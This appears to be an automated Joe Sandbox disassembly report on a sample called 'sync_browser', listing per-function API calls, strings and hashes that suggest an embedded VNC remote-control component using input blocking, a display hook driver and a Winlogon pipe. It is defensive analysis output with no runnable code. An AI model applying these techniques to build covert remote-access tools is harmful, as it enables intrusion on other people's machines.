Opcode ID: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
Instruction ID: 98fdb119c10b680a49d05d2899b564b044df4da4a79898401f0283db86afbcaa
Opcode Fuzzy Hash: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
Instruction Fuzzy Hash: EAC1A562A19A8386EB54AB24E4106BEA7A4FF84F88FC04137DE4D57A58DF7CD505C720

Function 00007FF7D594A890 Relevance: 61.5, APIs: 28, Strings: 7, Instructions: 227threadwindowtimeCOMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00007FF7D594A8C7
EndDialog.USER32 ref: 00007FF7D594A90F
GetForegroundWindow.USER32 ref: 00007FF7D594A91E
GetWindowThreadProcessId.USER32 ref: 00007FF7D594A929
GetCurrentProcessId.KERNEL32 ref: 00007FF7D594A931
FlashWindow.USER32 ref: 00007FF7D594A950
sprintf.LIBCMT ref: 00007FF7D594A97C
SetDlgItemTextA.USER32 ref: 00007FF7D594A991
SetWindowLongPtrA.USER32 ref: 00007FF7D594A9DA
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7D594AA19
SetDlgItemTextA.USER32 ref: 00007FF7D594AA74
SetDlgItemTextA.USER32 ref: 00007FF7D594AA86
GetModuleFileNameA.KERNEL32 ref: 00007FF7D594AA9C
LoadImageA.USER32 ref: 00007FF7D594AB27
GetDlgItem.USER32 ref: 00007FF7D594AB3C
SendMessageA.USER32 ref: 00007FF7D594AB54
SetTimer.USER32 ref: 00007FF7D594AB6A
EndDialog.USER32 ref: 00007FF7D594AB88
sprintf.LIBCMT ref: 00007FF7D594ABB2
SetDlgItemTextA.USER32 ref: 00007FF7D594ABC7
GetForegroundWindow.USER32 ref: 00007FF7D594ABF1
GetWindowThreadProcessId.USER32 ref: 00007FF7D594ABFC
GetCurrentProcessId.KERNEL32 ref: 00007FF7D594AC04
SetActiveWindow.USER32 ref: 00007FF7D594AC11
SetForegroundWindow.USER32 ref: 00007FF7D594AC28
MessageBeep.USER32 ref: 00007FF7D594AC33
DeleteObject.GDI32 ref: 00007FF7D594AC42
EndDialog.USER32 ref: 00007FF7D594AC50

Strings

AutoReject:%u, xrefs: 00007FF7D594ABAB
AutoAccept:%u, xrefs: 00007FF7D594AB9A
AutoReject: %u, xrefs: 00007FF7D594A975
\mylogo.bmp, xrefs: 00007FF7D594AAF6
admin, xrefs: 00007FF7D594AA03
AutoAccept: %u, xrefs: 00007FF7D594A96C
accept_reject_mesg, xrefs: 00007FF7D594AA0A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Window$Item$ProcessText$DialogForeground$CurrentLongMessageThreadsprintf$ActiveBeepDeleteFileFlashImageLoadModuleNameObjectPrivateProfileSendStringTimer
String ID: AutoAccept: %u$AutoAccept:%u$AutoReject: %u$AutoReject:%u$\mylogo.bmp$accept_reject_mesg$admin
API String ID: 384463373-239428621
Opcode ID: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
Instruction ID: 353ad1d7b94356a7ab6ffe2abf3865df0211a06d218a66dddcc6df7ac5409f3e
Opcode Fuzzy Hash: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
Instruction Fuzzy Hash: EEB1B421A18A5287E768AB24E8046BEA7A1FFC4F95FC44133DE4E17694DF3CE845C724

Function 00007FF7D5948E10 Relevance: 52.8, APIs: 20, Strings: 10, Instructions: 272registrythreadlibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7D5948E5C
GetProcAddress.KERNEL32 ref: 00007FF7D5948E78
EnumDisplaySettingsA.USER32 ref: 00007FF7D5948EB5
wprintf.LIBCMT ref: 00007FF7D5948F68
FreeLibrary.KERNEL32 ref: 00007FF7D5948F70
wprintf.LIBCMT ref: 00007FF7D5948FCF
RegCreateKeyA.ADVAPI32 ref: 00007FF7D5949096
RegCreateKeyA.ADVAPI32 ref: 00007FF7D59490BA
RegSetValueExA.ADVAPI32 ref: 00007FF7D59490F6
GetCurrentThreadId.KERNEL32 ref: 00007FF7D594918E
GetThreadDesktop.USER32 ref: 00007FF7D5949196
OpenInputDesktop.USER32 ref: 00007FF7D59491AE
SetThreadDesktop.USER32 ref: 00007FF7D59491BF
ChangeDisplaySettingsExA.USER32 ref: 00007FF7D59491DC
ChangeDisplaySettingsExA.USER32 ref: 00007FF7D59491FE
SetThreadDesktop.USER32 ref: 00007FF7D594920E
CloseDesktop.USER32 ref: 00007FF7D594921C
RegCloseKey.ADVAPI32 ref: 00007FF7D5949227
RegCloseKey.ADVAPI32 ref: 00007FF7D5949232
FreeLibrary.KERNEL32 ref: 00007FF7D594923B

Strings

Attach.ToDesktop, xrefs: 00007FF7D59490D7
DEVICE0, xrefs: 00007FF7D594900E
USER32, xrefs: 00007FF7D5948E3E
mv video hook driver2, xrefs: 00007FF7D5948F34, 00007FF7D5948F5A
mv2, xrefs: 00007FF7D5949121
No '%s' found., xrefs: 00007FF7D5948F61
DevNum:%dName:%sString:%sID:%sKey:%s, xrefs: 00007FF7D5948FC0
\DEVICE, xrefs: 00007FF7D5948FE0
SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2, xrefs: 00007FF7D5949080
EnumDisplayDevicesA, xrefs: 00007FF7D5948E6E

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseDisplayLibrarySettings$ChangeCreateFreewprintf$AddressCurrentEnumInputLoadOpenProcValue
String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
API String ID: 27940619-3388178877
Opcode ID: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
Instruction ID: cf31c6ecd139baba16d71a8dfc5dcc840f5d148b58537ae3dac0a2848bb68e32
Opcode Fuzzy Hash: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
Instruction Fuzzy Hash: EFC1A132A186928BEB14EF25A4506BEB7A1FF84B98FC44036EE4D57694DF3CD905C720

Function 00007FF7D59EA228 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328timeCOMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF7D59EA269
_errno.LIBCMT ref: 00007FF7D59EA271
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59EA27C
_errno.LIBCMT ref: 00007FF7D59EA29F
__doserrno.LIBCMT ref: 00007FF7D59EA2AB
_getdrive.LIBCMT ref: 00007FF7D59EA2D9
FindFirstFileExA.KERNEL32 ref: 00007FF7D59EA2F8
_errno.LIBCMT ref: 00007FF7D59EA326
_errno.LIBCMT ref: 00007FF7D59EA32E
_errno.LIBCMT ref: 00007FF7D59EA353
_errno.LIBCMT ref: 00007FF7D59EA35D
_errno.LIBCMT ref: 00007FF7D59EA36B
GetDriveTypeA.KERNEL32 ref: 00007FF7D59EA447
free.LIBCMT ref: 00007FF7D59EA45E
free.LIBCMT ref: 00007FF7D59EA4B0
_errno.LIBCMT ref: 00007FF7D59EA4B5
__doserrno.LIBCMT ref: 00007FF7D59EA4C1
_wsopen_s.LIBCMT ref: 00007FF7D59EA4FA
FileTimeToLocalFileTime.KERNEL32 ref: 00007FF7D59EA541
FileTimeToSystemTime.KERNEL32 ref: 00007FF7D59EA559
FileTimeToLocalFileTime.KERNEL32 ref: 00007FF7D59EA5BC
FileTimeToSystemTime.KERNEL32 ref: 00007FF7D59EA5D4
FileTimeToLocalFileTime.KERNEL32 ref: 00007FF7D59EA637
FileTimeToSystemTime.KERNEL32 ref: 00007FF7D59EA64F
FindClose.KERNEL32 ref: 00007FF7D59EA697
GetLastError.KERNEL32 ref: 00007FF7D59EA6E4
FindClose.KERNEL32 ref: 00007FF7D59EA6F4

Strings

./\, xrefs: 00007FF7D59EA30E

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Time$File$_errno$FindLocalSystem__doserrno$Closefree$DriveErrorFirstLastType_getdrive_invalid_parameter_noinfo_wsopen_s
String ID: ./\
API String ID: 385398445-3176372042
Opcode ID: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
Instruction ID: 0b24cc0f875d083defcf1afe3fb84a053dcc4ca85b625aadcfae7a48281458c5
Opcode Fuzzy Hash: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
Instruction Fuzzy Hash: 8FE1636290D25287EB64AF21A04817EF7A0FB86F58FD44036EE8D17A95DF3DE454CB20

Function 00007FF7D5931DD0 Relevance: 45.3, APIs: 30, Instructions: 281clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF7D5931E04
EmptyClipboard.USER32 ref: 00007FF7D5931E1B
CloseClipboard.USER32 ref: 00007FF7D5931E25

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseEmptyOpen
String ID:
API String ID: 1427272684-0
Opcode ID: 47939cc9f4710b2f51dff76dfff1cedda24071f281f1c25a3df912ff0cb64523
Instruction ID: 08597831ca1d771c54077b1f5fa90df779c4db3492103eae764eaf12f1f84111
Opcode Fuzzy Hash: 47939cc9f4710b2f51dff76dfff1cedda24071f281f1c25a3df912ff0cb64523
Instruction Fuzzy Hash: 8BC14D21B096129BFA14AF65E8545BDE7A1EF89F88BC44036CE0E577A5EF3CE404D360

Function 00007FF7D595E780 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 204libraryloadertimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D59E92A4: malloc.LIBCMT ref: 00007FF7D59E92C7

CreateRectRgn.GDI32 ref: 00007FF7D595E810
InitializeCriticalSection.KERNEL32 ref: 00007FF7D595E85C
InitializeCriticalSection.KERNEL32 ref: 00007FF7D595E886
CreateRectRgn.GDI32 ref: 00007FF7D595E8AA
timeGetTime.WINMM ref: 00007FF7D595E9B9
LoadLibraryA.KERNEL32 ref: 00007FF7D595E9F4
GetProcAddress.KERNEL32 ref: 00007FF7D595EA10
CreateEventA.KERNEL32 ref: 00007FF7D595EA62
CreateEventA.KERNEL32 ref: 00007FF7D595EA7F
CreateEventA.KERNEL32 ref: 00007FF7D595EA9C
CreateEventA.KERNEL32 ref: 00007FF7D595EAB9
CreateEventA.KERNEL32 ref: 00007FF7D595EAD6
CreateEventA.KERNEL32 ref: 00007FF7D595EAF3
CreateEventA.KERNEL32 ref: 00007FF7D595EB11
SetRectRgn.GDI32 ref: 00007FF7D595EB31
SetRectRgn.GDI32 ref: 00007FF7D595EB77

Strings

mouseupdate, xrefs: 00007FF7D595EA8C
restart, xrefs: 00007FF7D595EB00
quit, xrefs: 00007FF7D595EAE3
USER32, xrefs: 00007FF7D595E9ED
screenupdate, xrefs: 00007FF7D595EA6F
timer, xrefs: 00007FF7D595EA52
user1, xrefs: 00007FF7D595EAA9
user2, xrefs: 00007FF7D595EAC6
BlockInput, xrefs: 00007FF7D595EA06

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Create$Event$Rect$CriticalInitializeSection$AddressLibraryLoadProcTimemalloctime
String ID: BlockInput$USER32$mouseupdate$quit$restart$screenupdate$timer$user1$user2
API String ID: 33112563-1779637096
Opcode ID: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
Instruction ID: 54f7b0ec1efbf966317ea1c428f6cddb34655c854c34f592eb18613409fbd4a3
Opcode Fuzzy Hash: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
Instruction Fuzzy Hash: 4BB12832508BD18BE3289F78F854A9EBBA4FB44B04FD4452ACBAA16250CF7DF055C764

Function 00007FF7D5933770 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 192timewindowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7D5933785
CreateCompatibleDC.GDI32 ref: 00007FF7D59337A2
CreateCompatibleBitmap.GDI32 ref: 00007FF7D59337C7
GetDIBits.GDI32 ref: 00007FF7D593382B
GetDIBits.GDI32 ref: 00007FF7D5933856
GetDeviceCaps.GDI32 ref: 00007FF7D5933876
GetDeviceCaps.GDI32 ref: 00007FF7D5933887
GetDeviceCaps.GDI32 ref: 00007FF7D59338D2
CreateDIBSection.GDI32 ref: 00007FF7D5933901
CreateCompatibleBitmap.GDI32 ref: 00007FF7D5933920
DeleteObject.GDI32 ref: 00007FF7D593393A
timeGetTime.WINMM ref: 00007FF7D5933940
SelectObject.GDI32 ref: 00007FF7D593394F
BitBlt.GDI32 ref: 00007FF7D5933988
SelectObject.GDI32 ref: 00007FF7D5933994
timeGetTime.WINMM ref: 00007FF7D593399A
timeGetTime.WINMM ref: 00007FF7D59339A6
GetPixel.GDI32 ref: 00007FF7D59339EB
timeGetTime.WINMM ref: 00007FF7D59339F6
ReleaseDC.USER32 ref: 00007FF7D5933A3C
DeleteDC.GDI32 ref: 00007FF7D5933A45
DeleteObject.GDI32 ref: 00007FF7D5933A53

Strings

benchmark.cpp : Blit time %i Getpixeltime %i Use getpixel= %i, xrefs: 00007FF7D59339FC
, xrefs: 00007FF7D5933961

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateObjectTimetime$CapsCompatibleDeleteDevice$BitmapBitsSelect$PixelReleaseSection
String ID: $benchmark.cpp : Blit time %i Getpixeltime %i Use getpixel= %i
API String ID: 2697070071-1399849103
Opcode ID: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
Instruction ID: 3fd543bfcd3a52e71c4476cd19f2362c018eefa5c3aa4eea4bb2d48e22425113
Opcode Fuzzy Hash: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
Instruction Fuzzy Hash: 0381933562865287E718AB25A804A6EBB95FFC8F84FC44136DD8E57B68DF3CE005C710

Function 00007FF7D5956DD1 Relevance: 40.8, APIs: 15, Strings: 8, Instructions: 552filestringCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF7D595407F
CloseDesktop.USER32 ref: 00007FF7D59540C2
GetLogicalDriveStringsA.KERNEL32 ref: 00007FF7D5956DF7
GetDriveTypeA.KERNEL32 ref: 00007FF7D5956E64
SHGetMalloc.SHELL32 ref: 00007FF7D595705C
SHGetSpecialFolderLocation.SHELL32 ref: 00007FF7D5957072
SHGetPathFromIDListA.SHELL32 ref: 00007FF7D5957087
SetErrorMode.KERNEL32 ref: 00007FF7D5957131
FindFirstFileA.KERNEL32 ref: 00007FF7D5957147
SetErrorMode.KERNEL32 ref: 00007FF7D5957152
lstrlenA.KERNEL32 ref: 00007FF7D5957288
FindNextFileA.KERNEL32 ref: 00007FF7D5957346
FindClose.KERNEL32 ref: 00007FF7D595735A
LeaveCriticalSection.KERNEL32 ref: 00007FF7D5957BAC

Strings

f, xrefs: 00007FF7D5956E99
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF7D5954060
Network Favorites, xrefs: 00007FF7D5957030
Desktop, xrefs: 00007FF7D5957011
vncclient.cpp : vncClientThread , xrefs: 00007FF7D5954029
vncservice.cpp : SelectDesktop , xrefs: 00007FF7D595404B
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF7D595409A
My Documents, xrefs: 00007FF7D5956FED

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Find$CloseDesktopDriveErrorFileMode$CriticalFirstFolderFromInputLeaveListLocationLogicalMallocNextOpenPathSectionSpecialStringsTypelstrlen
String ID: Desktop$My Documents$Network Favorites$f$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 2965397059-206656798
Opcode ID: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
Instruction ID: d4bed274282cf3ca6d578e90bfd20624777937294eceff3416989574de8ca3ef
Opcode Fuzzy Hash: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
Instruction Fuzzy Hash: 2A42E522A0869286EB64AB35C8487FD6BA1EB84F98FC40233DE1D476D5CF3CD655C720

Function 00007FF7D5941100 Relevance: 40.6, APIs: 19, Strings: 4, Instructions: 331filesleeplibraryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF7D594119C
GetLastError.KERNEL32 ref: 00007FF7D59411A6
GetSystemDirectoryW.KERNEL32 ref: 00007FF7D594121F
lstrcatW.KERNEL32 ref: 00007FF7D5941233
LoadLibraryW.KERNEL32 ref: 00007FF7D5941240
GetProcAddress.KERNEL32 ref: 00007FF7D5941258
FreeLibrary.KERNEL32 ref: 00007FF7D5941290
sprintf_s.LIBCMTD ref: 00007FF7D59412BA
CreateFileW.KERNEL32 ref: 00007FF7D59412E3
GetLastError.KERNEL32 ref: 00007FF7D59412F2
WaitNamedPipeW.KERNEL32 ref: 00007FF7D594130B
GetCurrentProcessId.KERNEL32 ref: 00007FF7D594133B
WriteFile.KERNEL32 ref: 00007FF7D5941567
Sleep.KERNEL32 ref: 00007FF7D5941576
ReadFile.KERNEL32 ref: 00007FF7D5941594
OpenProcess.KERNEL32 ref: 00007FF7D59415A9
SetLastError.KERNEL32 ref: 00007FF7D59415E4
Sleep.KERNEL32 ref: 00007FF7D5941605
CloseHandle.KERNEL32 ref: 00007FF7D594160E

Strings

\\.\Pipe\TerminalServer\SystemExecSrvr\%d, xrefs: 00007FF7D59412A4
Winsta0\Winlogon, xrefs: 00007FF7D59411CC, 00007FF7D5941415
WinStationQueryInformationW, xrefs: 00007FF7D594124E
\winsta.dll, xrefs: 00007FF7D5941225

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFileLast$LibraryProcessSleep$AddressByteCharCloseCreateCurrentDirectoryFreeHandleLoadMultiNamedOpenPipeProcReadSystemWaitWideWritelstrcatsprintf_s
String ID: WinStationQueryInformationW$Winsta0\Winlogon$\\.\Pipe\TerminalServer\SystemExecSrvr\%d$\winsta.dll
API String ID: 2145620463-2328478964
Opcode ID: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
Instruction ID: 52a6909fdf165abed375cf80c28fa6e182d04065c66ba22c0841d1d093dd3f43
Opcode Fuzzy Hash: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
Instruction Fuzzy Hash: DCE1C222A186868BF720AF64D8446EDB7A1FF84B98FC04236DE4E57A94DF3CD945C710

Function 00007FF7D5954D7E Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 441COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF7D595407F
CloseDesktop.USER32 ref: 00007FF7D59540C2
GetSystemMetrics.USER32 ref: 00007FF7D5954E33
GetSystemMetrics.USER32 ref: 00007FF7D5954EBE
mouse_event.USER32 ref: 00007FF7D5954FBA
GetSystemMetrics.USER32 ref: 00007FF7D5954FE7
